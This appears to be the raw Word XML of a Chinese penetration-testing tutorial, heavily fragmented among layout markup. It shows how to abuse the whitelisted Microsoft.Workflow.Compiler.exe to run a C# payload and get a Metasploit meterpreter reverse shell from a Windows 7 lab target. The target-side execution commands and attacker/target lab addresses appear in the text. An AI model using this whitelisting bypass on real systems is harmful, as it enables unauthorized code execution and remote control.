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group style="position:absolute;margin-left:58.874pt;margin-top:286.874pt;width:4.125pt;height:13.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5737" coordsize="82,262">
        <v:shape style="position:absolute;left:1177;top:5737;width:82;height:262" coordorigin="1177,5737" coordsize="82,262" path="m1217,5742l1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5742,1217,5743,1217,5743,1217,5743,1217,5743,1217,5743,1217,5743,1217,5744,1217,5744,1217,5744,1217,5744,1217,5745,1217,5745,1217,5745,1217,5746,1217,5746,1217,5747,1217,5747,1217,5747,1217,5748,1217,5749,1217,5749,1217,5750,1217,5750,1217,5751,1217,5752,1217,5752,1217,5753,1217,5754,1217,5755,1217,5756,1217,5757,1217,5758,1217,5759,1217,5760,1217,5761,1217,5762,1217,5763,1217,5764,1217,5766,1217,5767,1217,5768,1217,5770,1217,5771,1217,5773,1217,5774,1217,5776,1217,5778,1217,5779,1217,5781,1217,5783,1217,5785,1217,5787,1217,5789,1217,5791,1217,5793,1217,5795,1217,5797,1217,5800,1217,5802,1217,5804,1217,5807,1217,5810,1217,5812,1217,5815,1217,5818,1217,5820,1217,5823,1217,5826,1217,5829,1217,5833,1217,5836,1217,5839,1217,5842,1217,5846,1217,5849,1217,5853,1217,5857,1217,5860,1217,5864,1217,5868,1217,5872,1217,5876,1217,5880,1217,5884,1217,5889,1217,5893,1217,5898,1217,5902,1217,5907,1217,5912,1217,5916,1217,5921,1217,5926,1217,5932,1217,5937,1217,5942,1217,5947,1217,5953,1217,5959,1217,5964,1217,5970,1217,5976,1217,5982e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:298.874pt;width:4.125pt;height:13.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5977" coordsize="82,262">
        <v:shape style="position:absolute;left:1177;top:5977;width:82;height:262" coordorigin="1177,5977" coordsize="82,262" path="m1217,5982l1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5982,1217,5983,1217,5983,1217,5983,1217,5983,1217,5983,1217,5983,1217,5984,1217,5984,1217,5984,1217,5984,1217,5985,1217,5985,1217,5985,1217,5985,1217,5986,1217,5986,1217,5987,1217,5987,1217,5988,1217,5988,1217,5989,1217,5989,1217,5990,1217,5990,1217,5991,1217,5992,1217,5993,1217,5993,1217,5994,1217,5995,1217,5996,1217,5997,1217,5998,1217,5999,1217,6000,1217,6001,1217,6002,1217,6003,1217,6004,1217,6006,1217,6007,1217,6008,1217,6010,1217,6011,1217,6013,1217,6014,1217,6016,1217,6018,1217,6019,1217,6021,1217,6023,1217,6025,1217,6027,1217,6029,1217,6031,1217,6033,1217,6035,1217,6037,1217,6040,1217,6042,1217,6045,1217,6047,1217,6050,1217,6052,1217,6055,1217,6058,1217,6061,1217,6063,1217,6066,1217,6070,1217,6073,1217,6076,1217,6079,1217,6082,1217,6086,1217,6089,1217,6093,1217,6097,1217,6100,1217,6104,1217,6108,1217,6112,1217,6116,1217,6120,1217,6125,1217,6129,1217,6133,1217,6138,1217,6142,1217,6147,1217,6152,1217,6157,1217,6162,1217,6167,1217,6172,1217,6177,1217,6182,1217,6188,1217,6193,1217,6199,1217,6204,1217,6210,1217,6216,1217,6222e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:456.600pt;width:467.400pt;height:282.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId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6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10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注APT攻击与防御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3783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>poor.blogspot.com/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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：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请多喝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点热水或者凉白开，身体特别重要。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313" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明：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Microso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ft.Workflow.Compiler.exe所在路径没有被系统添加PATH环境变量中，因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此，Microsoft.Wor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kflow.Compiler命令无法识别。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220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基于白名单Microsoft.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Workflow.Compiler.exe配置payload：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51" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2125" w:firstLine="-375"/>
      </w:pP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Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>默认位置：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Wind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe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3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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="57"/>
        </w:rPr>
        <w:t> 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Debian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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="7131" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t>  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192.168.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> 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Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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7</w:t>
      </w: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配</w:t>
      </w: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置攻击机msf：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9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靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：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74.500pt;margin-top:48.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:690" coordorigin="1490,970" coordsize="8990,690" path="m1510,1000l1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1510,1000,1511,1000,1512,1000,1512,1000,1514,1000,1515,1000,1517,1000,1519,1000,1521,1000,1524,1000,1528,1000,1532,1000,1536,1000,1541,1000,1546,1000,1552,1000,1559,1000,1566,1000,1575,1000,1583,1000,1593,1000,1603,1000,1615,1000,1627,1000,1640,1000,1654,1000,1668,1000,1684,1000,1701,1000,1719,1000,1738,1000,1758,1000,1780,1000,1802,1000,1826,1000,1851,1000,1877,1000,1904,1000,1933,1000,1963,1000,1995,1000,2028,1000,2063,1000,2099,1000,2136,1000,2175,1000,2216,1000,2259,1000,2303,1000,2348,1000,2396,1000,2445,1000,2496,1000,2549,1000,2604,1000,2660,1000,2719,1000,2779,1000,2841,1000,2906,1000,2972,1000,3041,1000,3112,1000,3184,1000,3259,1000,3336,1000,3416,1000,3498,1000,3582,1000,3668,1000,3757,1000,3848,1000,3941,1000,4037,1000,4136,1000,4236,1000,4340,1000,4446,1000,4555,1000,4666,1000,4780,1000,4897,1000,5017,1000,5139,1000,5264,1000,5392,1000,5523,1000,5657,1000,5793,1000,5933,1000,6076,1000,6222,1000,6370,1000,6522,1000,6677,1000,6835,1000,6997,1000,7161,1000,7329,1000,7500,1000,7675,1000,7853,1000,8034,1000,8219,1000,8407,1000,8598,1000,8793,1000,8992,1000,9194,1000,9400,1000,9609,1000,9823,1000,10039,1000,10260,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1006,10484,1007,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1013,10484,1014,10484,1015,10484,1017,10484,1018,10484,1020,10484,1021,10484,1023,10484,1025,10484,1027,10484,1029,10484,1031,10484,1034,10484,1036,10484,1039,10484,1041,10484,1044,10484,1047,10484,1050,10484,1053,10484,1056,10484,1059,10484,1063,10484,1066,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1090,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1126,10484,1131,10484,1137,10484,1143,10484,1149,10484,1155,10484,1162,10484,1169,10484,1175,10484,1182,10484,1190,10484,1197,10484,1205,10484,1212,10484,1220,10484,1229,10484,1237,10484,1246,10484,1254,10484,1263,10484,1273,10484,1282,10484,1292,10484,1302,10484,1312,10484,1322,10484,1332,10484,1343,10484,1354,10484,1365,10484,1377,10484,1388,10484,1400,10484,1412,10484,1425,10484,1437,10484,1450,10484,1463,10484,1477,10484,1490,10484,1504,10484,1518,10484,1533,10484,1548,10484,1563,10484,1578,10484,1593,10484,1609,10484,1625,10484,1641,10484,1658,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10484,1675,10483,1675,10482,1675,10482,1675,10480,1675,10479,1675,10477,1675,10475,1675,10473,1675,10470,1675,10466,1675,10462,1675,10458,1675,10453,1675,10448,1675,10442,1675,10435,1675,10428,1675,10419,1675,10411,1675,10401,1675,10391,1675,10379,1675,10367,1675,10354,1675,10340,1675,10326,1675,10310,1675,10293,1675,10275,1675,10256,1675,10236,1675,10215,1675,10192,1675,10168,1675,10143,1675,10117,1675,10090,1675,10061,1675,10031,1675,9999,1675,9966,1675,9931,1675,9895,1675,9858,1675,9819,1675,9778,1675,9735,1675,9691,1675,9646,1675,9598,1675,9549,1675,9498,1675,9445,1675,9391,1675,9334,1675,9275,1675,9215,1675,9153,1675,9088,1675,9022,1675,8953,1675,8883,1675,8810,1675,8735,1675,8658,1675,8578,1675,8497,1675,8413,1675,8326,1675,8238,1675,8146,1675,8053,1675,7957,1675,7859,1675,7758,1675,7654,1675,7548,1675,7439,1675,7328,1675,7214,1675,7097,1675,6977,1675,6855,1675,6730,1675,6602,1675,6471,1675,6337,1675,6201,1675,6061,1675,5918,1675,5773,1675,5624,1675,5472,1675,5317,1675,5159,1675,4997,1675,4833,1675,4665,1675,4494,1675,4319,1675,4141,1675,3960,1675,3776,1675,3587,1675,3396,1675,3201,1675,3002,1675,2800,1675,2594,1675,2385,1675,2172,1675,1955,1675,1734,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1675,1510,1674,1510,1674,1510,1674,1510,1674,1510,1674,1510,1673,1510,1673,1510,1673,1510,1673,1510,1672,1510,1672,1510,1671,1510,1671,1510,1670,1510,1669,1510,1669,1510,1668,1510,1667,1510,1666,1510,1665,1510,1664,1510,1663,1510,1662,1510,1660,1510,1659,1510,1658,1510,1656,1510,1655,1510,1653,1510,1651,1510,1649,1510,1647,1510,1645,1510,1643,1510,1641,1510,1638,1510,1636,1510,1633,1510,1631,1510,1628,1510,1625,1510,1622,1510,1618,1510,1615,1510,1612,1510,1608,1510,1604,1510,1601,1510,1597,1510,1593,1510,1588,1510,1584,1510,1579,1510,1575,1510,1570,1510,1565,1510,1560,1510,1554,1510,1549,1510,1543,1510,1537,1510,1531,1510,1525,1510,1519,1510,1512,1510,1506,1510,1499,1510,1492,1510,1485,1510,1477,1510,1470,1510,1462,1510,1454,1510,1446,1510,1437,1510,1429,1510,1420,1510,1411,1510,1402,1510,1392,1510,1383,1510,1373,1510,1363,1510,1352,1510,1342,1510,1331,1510,1320,1510,1309,1510,1298,1510,1286,1510,1274,1510,1262,1510,1250,1510,1237,1510,1224,1510,1211,1510,1198,1510,1184,1510,1170,1510,1156,1510,1141,1510,1127,1510,1112,1510,1097,1510,1081,1510,1065,1510,1049,1510,1033,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:35.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:579.500pt;width:0.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,11590" coordsize="10,670">
        <v:shape style="position:absolute;left:10390;top:11590;width:10;height:670" coordorigin="10390,11590" coordsize="10,670" path="m10402,11610l10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11610,10402,11611,10402,11611,10402,11611,10402,11611,10402,11611,10402,11612,10402,11612,10402,11613,10402,11613,10402,11613,10402,11614,10402,11615,10402,11615,10402,11616,10402,11617,10402,11618,10402,11618,10402,11619,10402,11620,10402,11622,10402,11623,10402,11624,10402,11625,10402,11627,10402,11628,10402,11630,10402,11631,10402,11633,10402,11635,10402,11637,10402,11639,10402,11641,10402,11643,10402,11646,10402,11648,10402,11651,10402,11653,10402,11656,10402,11659,10402,11662,10402,11665,10402,11668,10402,11672,10402,11675,10402,11679,10402,11682,10402,11686,10402,11690,10402,11694,10402,11699,10402,11703,10402,11708,10402,11713,10402,11717,10402,11723,10402,11728,10402,11733,10402,11739,10402,11744,10402,11750,10402,11756,10402,11762,10402,11769,10402,11775,10402,11782,10402,11789,10402,11796,10402,11803,10402,11810,10402,11818,10402,11826,10402,11834,10402,11842,10402,11850,10402,11859,10402,11868,10402,11877,10402,11886,10402,11896,10402,11905,10402,11915,10402,11925,10402,11935,10402,11946,10402,11957,10402,11967,10402,11979,10402,11990,10402,12002,10402,12014,10402,12026,10402,12038,10402,12051,10402,12063,10402,12077,10402,12090,10402,12103,10402,12117,10402,12131,10402,12146,10402,12160,10402,12175,10402,12190,10402,12206,10402,12221,10402,12237,10402,12254,10402,12270e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:579.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11590" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:11590;width:8990;height:670" coordorigin="1490,11590" coordsize="8990,670" path="m1510,11610l1510,11610,1510,11610,1510,11610,1510,11610,1510,11610,1510,11610,1511,11610,1512,11610,1512,11610,1514,11610,1515,11610,1517,11610,1519,11610,1521,11610,1524,11610,1528,11610,1532,11610,1536,11610,1541,11610,1546,11610,1552,11610,1559,11610,1566,11610,1575,11610,1583,11610,1593,11610,1603,11610,1615,11610,1627,11610,1640,11610,1654,11610,1668,11610,1684,11610,1701,11610,1719,11610,1738,11610,1758,11610,1780,11610,1802,11610,1826,11610,1851,11610,1877,11610,1904,11610,1933,11610,1963,11610,1995,11610,2028,11610,2063,11610,2099,11610,2136,11610,2175,11610,2216,11610,2259,11610,2303,11610,2348,11610,2396,11610,2445,11610,2496,11610,2549,11610,2604,11610,2660,11610,2719,11610,2779,11610,2841,11610,2906,11610,2972,11610,3041,11610,3112,11610,3184,11610,3259,11610,3336,11610,3416,11610,3498,11610,3582,11610,3668,11610,3757,11610,3848,11610,3941,11610,4037,11610,4136,11610,4236,11610,4340,11610,4446,11610,4555,11610,4666,11610,4780,11610,4897,11610,5017,11610,5139,11610,5264,11610,5392,11610,5523,11610,5657,11610,5793,11610,5933,11610,6076,11610,6222,11610,6370,11610,6522,11610,6677,11610,6835,11610,6997,11610,7161,11610,7329,11610,7500,11610,7675,11610,7853,11610,8034,11610,8219,11610,8407,11610,8598,11610,8793,11610,8992,11610,9194,11610,9400,11610,9609,11610,9823,11610,10039,11610,10260,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11610,10484,11611,10484,11611,10484,11611,10484,11611,10484,11611,10484,11612,10484,11612,10484,11613,10484,11613,10484,11613,10484,11614,10484,11615,10484,11615,10484,11616,10484,11617,10484,11618,10484,11618,10484,11619,10484,11620,10484,11622,10484,11623,10484,11624,10484,11625,10484,11627,10484,11628,10484,11630,10484,11631,10484,11633,10484,11635,10484,11637,10484,11639,10484,11641,10484,11643,10484,11646,10484,11648,10484,11651,10484,11653,10484,11656,10484,11659,10484,11662,10484,11665,10484,11668,10484,11672,10484,11675,10484,11679,10484,11682,10484,11686,10484,11690,10484,11694,10484,11699,10484,11703,10484,11708,10484,11713,10484,11717,10484,11723,10484,11728,10484,11733,10484,11739,10484,11744,10484,11750,10484,11756,10484,11762,10484,11769,10484,11775,10484,11782,10484,11789,10484,11796,10484,11803,10484,11810,10484,11818,10484,11826,10484,11834,10484,11842,10484,11850,10484,11859,10484,11868,10484,11877,10484,11886,10484,11896,10484,11905,10484,11915,10484,11925,10484,11935,10484,11946,10484,11957,10484,11967,10484,11979,10484,11990,10484,12002,10484,12014,10484,12026,10484,12038,10484,12051,10484,12063,10484,12077,10484,12090,10484,12103,10484,12117,10484,12131,10484,12146,10484,12160,10484,12175,10484,12190,10484,12206,10484,12221,10484,12237,10484,12254,10484,12270,10484,12270,10484,12270,10484,12270,10484,12270,10484,12270,10484,12270,10483,12270,10482,12270,10482,12270,10480,12270,10479,12270,10477,12270,10475,12270,10473,12270,10470,12270,10466,12270,10462,12270,10458,12270,10453,12270,10448,12270,10442,12270,10435,12270,10428,12270,10419,12270,10411,12270,10401,12270,10391,12270,10379,12270,10367,12270,10354,12270,10340,12270,10326,12270,10310,12270,10293,12270,10275,12270,10256,12270,10236,12270,10215,12270,10192,12270,10168,12270,10143,12270,10117,12270,10090,12270,10061,12270,10031,12270,9999,12270,9966,12270,9931,12270,9895,12270,9858,12270,9819,12270,9778,12270,9735,12270,9691,12270,9646,12270,9598,12270,9549,12270,9498,12270,9445,12270,9391,12270,9334,12270,9275,12270,9215,12270,9153,12270,9088,12270,9022,12270,8953,12270,8883,12270,8810,12270,8735,12270,8658,12270,8578,12270,8497,12270,8413,12270,8326,12270,8238,12270,8146,12270,8053,12270,7957,12270,7859,12270,7758,12270,7654,12270,7548,12270,7439,12270,7328,12270,7214,12270,7097,12270,6977,12270,6855,12270,6730,12270,6602,12270,6471,12270,6337,12270,6201,12270,6061,12270,5918,12270,5773,12270,5624,12270,5472,12270,5317,12270,5159,12270,4997,12270,4833,12270,4665,12270,4494,12270,4319,12270,4141,12270,3960,12270,3776,12270,3587,12270,3396,12270,3201,12270,3002,12270,2800,12270,2594,12270,2385,12270,2172,12270,1955,12270,1734,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12270,1510,12269,1510,12269,1510,12269,1510,12269,1510,12268,1510,12268,1510,12267,1510,12267,1510,12267,1510,12266,1510,12265,1510,12265,1510,12264,1510,12263,1510,12262,1510,12262,1510,12261,1510,12260,1510,12259,1510,12257,1510,12256,1510,12255,1510,12253,1510,12252,1510,12250,1510,12249,1510,12247,1510,12245,1510,12243,1510,12241,1510,12239,1510,12237,1510,12234,1510,12232,1510,12229,1510,12227,1510,12224,1510,12221,1510,12218,1510,12215,1510,12212,1510,12208,1510,12205,1510,12201,1510,12198,1510,12194,1510,12190,1510,12186,1510,12181,1510,12177,1510,12172,1510,12167,1510,12163,1510,12158,1510,12152,1510,12147,1510,12141,1510,12136,1510,12130,1510,12124,1510,12118,1510,12111,1510,12105,1510,12098,1510,12091,1510,12084,1510,12077,1510,12070,1510,12062,1510,12054,1510,12046,1510,12038,1510,12030,1510,12021,1510,12012,1510,12003,1510,11994,1510,11985,1510,11975,1510,11965,1510,11955,1510,11945,1510,11934,1510,11923,1510,11913,1510,11901,1510,11890,1510,11878,1510,11866,1510,11854,1510,11842,1510,11829,1510,11817,1510,11803,1510,11790,1510,11777,1510,11763,1510,11749,1510,11734,1510,11720,1510,11705,1510,11690,1510,11674,1510,11659,1510,11643,1510,11626,1510,11610e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:579.600pt;width:445.800pt;height:33.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:103.800pt;width:467.400pt;height:161.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:284.399pt;width:467.400pt;height:129.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11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0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35" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="142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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-12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C:\Windows\Microsoft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NET\Framework\v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="21"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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0.30319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\Microsoft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Workflow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Compi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ler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exe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poc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xml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Micropoor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tcp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70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1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>结合meterpret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>er：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-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：payload.cs需要用到Syste</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m.Workflow.Activities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靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="158" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="142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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="-12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C:\Windows\Microsoft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NET\Framework64\v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="23"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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0.30319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\Microsoft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Workflow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piler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exe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poc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xml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Micropoor_rev1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cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
